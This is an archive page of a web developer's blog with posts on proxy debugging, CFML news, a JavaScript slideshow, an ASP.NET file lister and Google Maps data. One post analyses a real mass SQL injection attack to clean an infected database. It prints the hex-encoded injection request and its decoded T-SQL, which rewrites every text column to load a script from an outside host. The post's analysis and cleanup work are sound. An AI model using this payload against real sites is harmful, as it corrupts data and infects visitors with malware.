Archive for the ‘web’ Category

Proxy your connections for debugging

Monday, February 23rd, 2009

One of the tricky things about having flash or ajax client applications that request data on their own is knowing what they are requesting and when. I went nuts today trying to figure out if my ajax was making the right calls and getting back data, 404 messages, or nothing at all. That was until i remembered Squid.

Squid is a simple proxy server used in the unix world for logging or filtering web content but it can be very handy as a desktop tool for debugging rich internet applications.


Looking around, I found this great installer and GUI front end for Squid for OSX called SquidMan.

When you first launch SquidMan it will prompt you to install the Squid subsystem, just click OK enter your password and it will bring up the settings:

You can leave all of the settings as the default

Then from the main dialog, click “Start Squid”

In firefox, find the network settings under the Advanced tab:

Enter your local computer 127.0.0.1 as the proxy host:

This will now force all of your Firefox traffic to go through the squid proxy. From the main SquidMan application settings, you can now choose “Tools” and see a log of every URL that is requested by javascript or flash within your browser:

The whole web is malware today

Saturday, January 31st, 2009

Is it just me, or is Google reporting all sites as Malware for everyone today?

screenshot of google

Railo joins Jboss. How did I miss this?

Thursday, November 20th, 2008

I spend most of my days lately doing enterprise-ish type stuff in Java. Way back in the day though, my first paying programming job was writing Cold Fusion during the first dot-com upsurge. Since then I have always had a bit of a soft spot for CFML. I still think it is one of the best languages for non-pro programmers to write pages in and for professionals to do quick mock-ups with. When compared to PHP I think it is generally a better framework for prototyping and simple applications.

The one thing that has always kept me, and I’m sure many others, from choosing CFM for anything was the fact that the license costs over $1000 and not many web-hosts support it.

I sort of always thought Macromedia would open source Cold Fusion and I’m somewhat surprised Adobe hasn’t made moves in this direction. Over the past few years several projects have made some front is building an open source alternative. The smith project looked like it was the best option until it seemed to fizzle out earlier this year. Now, after clicking around I noticed a press release that Railo has joined Jboss and will be open sourced!

This is huge news if you are a fan of CFM. Jboss has a lot of clout and resources to get things done. I expect that they will release something that is solid and eventually compete on par with the offerings from Adobe itself.

This combined with the progress people have made running other languages on the JVM – Groovy, Scala, Ruby, PHP, and Python – makes java application servers a clear choice for running all sorts of scripted sites on true application servers.

Now, will someone please open source a port of ASP classic so I can host all my legacy apps on linux? (Sun, I’m looking at you. who is paying for Sun Java System ASP anyway?).

Javascript Image Morph

Sunday, November 16th, 2008

I’ve been working on an image gallery and needed a way to do nice fade/morphs between a list of images for a slideshow. I used prototype and scriptalicious. Here is how I did it:

See the Demo Here

Download Entire Source of Example

Javascript to do the work:

//preload the images and load them into an array
imageArray = new Array(); 
 
var image01 = new Image();
image01.src = 'photo_01.jpg';
imageArray[imageArray.length] = image01;
 
var image02 = new Image();
image02.src = 'photo_02.jpg';
imageArray[imageArray.length] = image02;
 
var image03 = new Image();
image03.src = 'photo_03.jpg';
imageArray[imageArray.length] = image03;
 
var image04 = new Image();
image04.src = 'photo_04.jpg';
imageArray[imageArray.length] = image04;
 
var image05 = new Image();
image05.src = 'photo_05.jpg';
imageArray[imageArray.length] = image05;
 
// imageIndex is going to be the index of the next image to display.  
// images 0 and 1 are already loaded into the html
var imageIndex = 1;
 
function switchImage() {
	// place the next image to be displayed to the front
	$('imageFront').src = imageArray[imageIndex].src;
 
	// make the image in front appear, when it is done swap it with the image in the back
	new Effect.Appear('imageFront', {
		afterFinish: function() { 
			// make the image in the back the same src as the image in the front
			$('imageBehind').src = $('imageFront').src;
			
			//hide the image in the front
			$('imageFront').style.display = 'none';
			
			// increment the index
			imageIndex++;
			// if we have indexed past the end of the array, go back to zero
			if (imageIndex == imageArray.length) { 
				imageIndex = 0;
			}
		}
	});
}

Within the HTML, the only tricky thing here is that you need to position the two IMG tags so they are on top of each other. For my purpose absolute positioning was okay. It may take alittle more work for relative positioning.

<html>
<head>
	<script type="text/javascript" src="js/prototype.js"></script>
	<script type="text/javascript" src="js/scriptaculous.js?load=effects"></script>
	<script language="javascript">
             /* code from above goes here */
	</script>
</head>
<body onload="setInterval('switchImage()', 3000);">
	<img id="imageBehind" src="photo_01.jpg" style="position:absolute; top:0; left:0;" />
	<img id="imageFront" src="photo_02.jpg" style="position:absolute; top:0; left:0; display:none;" />
</body>
</html>

** update. thanks to Star for letting me know that the morph blinked in Firefox 2.0. I fixed the post and the example so it doesn’t do that anymore. **

Simple .NET script to list all of the .swf files in a folder as XML

Thursday, November 13th, 2008

Here is some handy code for if you have a bunch of .swf files and you need to get some XML to load them into flash. It should also totally be easy to change the script to list any file type you need enumerated.

<%@ Page ContentType="text/xml" %>
<%@ Import Namespace="System.Xml" %>
<%@ Import Namespace="System.IO" %>
<script language="C#" runat="server">
	void Page_Load(object sender, System.EventArgs e) {
		XmlWriter writer = XmlWriter.Create(Response.OutputStream);
		
		writer.WriteStartElement("scenes");
		DirectoryInfo di = new DirectoryInfo(Server.MapPath(""));
		FileInfo[] files = di.GetFiles("*.swf");
		foreach(FileInfo fi in files) {
			
			writer.WriteStartElement("movie");
			writer.WriteAttributeString("name", fi.Name);
			writer.WriteEndElement();
 
		}
		writer.WriteEndElement();
 
		writer.Close();
	}
</script>

This will output something like:

<?xml version="1.0" encoding="utf-8"?>
<scenes>
    <movie name="scene_001.swf"/>
    <movie name="scene_002.swf"/>
    <movie name="scene_003.swf"/>
    <movie name="scene_004.swf"/>
    <movie name="scene_005.swf"/>
    <movie name="scene_006.swf"/>
</scenes>

Using SQL Injection attack code to repair database

Thursday, September 25th, 2008

Now that Google has started flagging sites that are linking to badware in their index I’ve been getting quite a few calls from people who have been flagged and need to get back on track.

These are often sites that were written a while back (not by myself) when developers didn’t think as much about SQL injection as they do now. Sometimes the code was just poorly written by someone who didn’t know better. However it happened, each site has its own challenge.

Fixing the security hole is generally straight forward — I usually just have to identify where the SQL isn’t properly escaped and fix that code. The hard part I have had fixing these sites is fixing the database itself. Some clients have backups, and some I can fix with SQL Log Rescue, but generally a lot of small clients simply don’t have great control over their server and often don’t have any backups.

I had one such of these clients this week where their database had hundreds and hundreds of tables, all with malware code injected into the data. I was initially going to write a script to clean all the data, but after looking at the malware attack, I was able to use their own code to fix the database.

In the server log files. I noticed this request was coming in for every script several times a day. Looks like it just wanders the internet hoping that that id=2 in the query string won’t be escaped in the code.

GET script.asp?id=2 ;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434c415245204054207661726368617228323535292c40432076617263686172283430303029204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420612e6e616d652c622e6e616d652066726f6d207379736f626a6563747320612c737973636f6c756d6e73206220776865726520612e69643d622e696420616e6420612e78747970653d27752720616e642028622e78747970653d3939206f7220622e78747970653d3335206f7220622e78747970653d323331206f7220622e78747970653d31363729204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d20205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20657865632827757064617465205b272b40542b275d20736574205b272b40432b275d3d2727223e3c2f7469746c653e3c736372697074207372633d22687474703a2f2f7777772e776972656c7573742e636f6d2f626164646965732d7363726970742e6a73223e3c2f7363726970743e3c212d2d27272b5b272b40432b275d20776865726520272b40432b27206e6f74206c696b6520272725223e3c2f7469746c653e3c736372697074207372633d22687474703a2f2f7777772e776972656c7573742e636f6d2f626164646965732d7363726970742e6a73223e3c2f7363726970743e3c212d2d272727294645544348204e4558542046524f4d20205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f7220%20AS%20CHAR(4000));EXEC(@S); 80 - 121.18.89.190 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1) - - www.wirelust.com 200 0 0 14827 1516 9781

 

If the id isn’t escaped, as it wasn’t in this situation, a query like this will hit your SQL server:

SELECT *
FROM SomeTable
WHERE id=2;DECLARE @S CHAR(4000)
SET @S=CAST(0x4445434c415245204054207661726368617228323535292c40432076617263686172283430303029204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420612e6e616d652c622e6e616d652066726f6d207379736f626a6563747320612c737973636f6c756d6e73206220776865726520612e69643d622e696420616e6420612e78747970653d27752720616e642028622e78747970653d3939206f7220622e78747970653d3335206f7220622e78747970653d323331206f7220622e78747970653d31363729204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d20205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20657865632827757064617465205b272b40542b275d20736574205b272b40432b275d3d2727223e3c2f7469746c653e3c736372697074207372633d22687474703a2f2f7777772e776972656c7573742e636f6d2f626164646965732d7363726970742e6a73223e3c2f7363726970743e3c212d2d27272b5b272b40432b275d20776865726520272b40432b27206e6f74206c696b6520272725223e3c2f7469746c653e3c736372697074207372633d22687474703a2f2f7777772e776972656c7573742e636f6d2f626164646965732d7363726970742e6a73223e3c2f7363726970743e3c212d2d272727294645544348204e4558542046524f4d20205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f7220 AS CHAR(4000));
EXEC(@S);

 

hmm. okay. so what is it executing as the value of @S?
If you change the statement from EXEC(@S) to PRINT(@S) you get this:
Warning: Do not run this on your server, it will mess up ALL of your data

DECLARE @T VARCHAR(255),@C VARCHAR(4000)
DECLARE Table_Cursor CURSOR FOR 
	SELECT a.name,b.name
	FROM sysobjects a,syscolumns b
	WHERE a.id=b.id
	and a.xtype='u'
	and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
 
OPEN Table_Cursor
FETCH NEXT FROM  Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN
	EXEC('update ['+@T+'] set ['+@C+']=''"></title><script src="http://www.wirelust.com/baddies-script.js"></script><!--''+['+@C+'] where '+@C+' not like ''%"></title><script src="http://www.wirelust.com/baddies-script.js"></script><!--''')
	FETCH NEXT FROM  Table_Cursor INTO @T,@C 
END 
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

 

I thought this code was pretty clever. It selects a cursor that contains every varchar and text field in every table on the database, then loops over the cursor and issues an update command to append their bad script to the end of the data in each field.

Luckily, it is in their best interest to leave your data in place and just place their code at the end – it increases the chance you won’t know your site is infected.

Since all of the original data is still in the database, I was able to tweak their code a little bit to write a script to fix the data:

DECLARE @T VARCHAR(255), @C VARCHAR(4000), @SQL VARCHAR(5000)
DECLARE Table_Cursor CURSOR FOR 
	SELECT a.name,b.name
	FROM sysobjects a,syscolumns b
	WHERE a.id=b.id
	and a.xtype='u'
	and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
 
OPEN Table_Cursor 
FETCH NEXT FROM  Table_Cursor INTO @T,@C 
	WHILE(@@FETCH_STATUS=0) 
	BEGIN 
		SET @SQL = 'update ['+@T+'] set ['+@C+']=Replace(['+@C+'], ''<script src="http://www.wirelust.com/baddies-script.js"></script>'', '''') where '+@C+' like ''%<script src="http://www.wirelust.com/baddies-script.js"></script>%'''
		PRINT @SQL
		-- exec(@SQL)
		FETCH NEXT FROM  Table_Cursor INTO @T,@C
	END 
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

Google Maps You Have Failed Me

Thursday, December 7th, 2006

Today I had to meet at a clients office that I had never been to before. Given that I have 100% faith in technology, I mapped out the directions using a map I had created for the client as my starting point. When I got there I was in the totally incorrect place (a first for me when using google). I opened up Google maps on my phone and was able to get directions from the incorrect address to the correct one. I assumed at the time that the original map had the incorrect address typed in on it.

When I got back to the office I tried to fix the client’s site and found myself unable to. It turns out that the maps that google spits out for its embedded API are different than the maps that google’s site itself uses. I searched and searched and couldn’t find any reference of this anywhere on the web. I will search more after this post.

Here is the map that google’s site spits out for the address I am searching for:

Here is the map that google’s API returns for the same area:

It seems that google’s site and Google mobile are using map data from Navteq, while the API is using map data from TeleAtlas.

Interestingly though, the TeleAtlas data appears to be correct and more up to date, but the geocoding for the address is only correct on the Navteq map.

The geocode for the same address on the more up to date map is three miles off.

For good measure I checked out the Yahoo api, which says that it uses data from both TeleAtlas and/or Navteq. It appears to just be Navteq though:

Anyone know anything more about this?

Also, taking screen shots I realize just how 1337 I really am, or messy, ha.